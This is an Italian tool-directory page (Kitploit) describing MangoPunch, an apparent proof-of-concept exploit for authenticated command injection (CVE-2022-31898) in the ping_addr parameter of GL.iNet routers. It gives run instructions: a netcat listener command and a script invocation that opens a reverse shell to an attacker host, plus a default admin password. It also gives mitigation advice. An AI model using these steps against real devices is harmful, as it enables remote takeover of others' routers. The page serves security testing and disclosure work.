Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
MangoPunch-CVE-2022-31898 — Strumento per iniezione di comandi autenticata (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
Strumenti/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Strumento per iniezione di comandi autenticata (CVE-2022-31898) - HACKCONRD 2026.

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🥭 MangoPunch: CVE-2022-31898

Iniezione di comandi OS autenticata per dispositivi GL.iNet

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Panoramica della vulnerabilità

Questo repository contiene un Proof of Concept (PoC) tecnico per una vulnerabilità di Esecuzione Remota di Comandi (RCE) trovata su GL.iNet MT300N-V2 (Mango) e altri modelli con versioni firmware inferiori a 3.215.

Il difetto risiede nel parametro ping_addr dell'API diagnostica, consentendo a un attaccante autenticato di eseguire comandi arbitrari del sistema tramite metacaratteri shell (;).


🚀 Guida all'esecuzione

1. Prepara il tuo Listener

Apri un terminale sulla tua macchina attaccante (Kali Linux) e avvia un listener Netcat:

root@kitploit:~
nc -lvnp 9292

2. Esegui l'Exploit

Usa il comando seguente per attivare la reverse shell:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Parametri dello Script

FlagNome completoDescrizionePredefinito
-R--rhostIP del target remoto (Router)Richiesto
-P--rportPorta di gestione web443
-L--lhostIP del listener (Kali/Attaccante)Richiesto
-l--lportPorta del listenerRichiesto
-p--pwdPassword amministratoregoodlife
-t--httpsAbilita HTTPSFalse

🛡️ Mitigazione

  • Aggiorna il firmware: Assicurati che il dispositivo esegua la versione 3.215 o superiore.
  • Validazione dell'input: Gli sviluppatori dovrebbero implementare una rigorosa validazione Regex per i parametri IP/Hostname ed evitare funzioni che invocano la shell passando stringhe grezze al sistema operativo.

Disclaimer: Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio. MangoPunch: CVE-2022-31898

Scarica lo strumento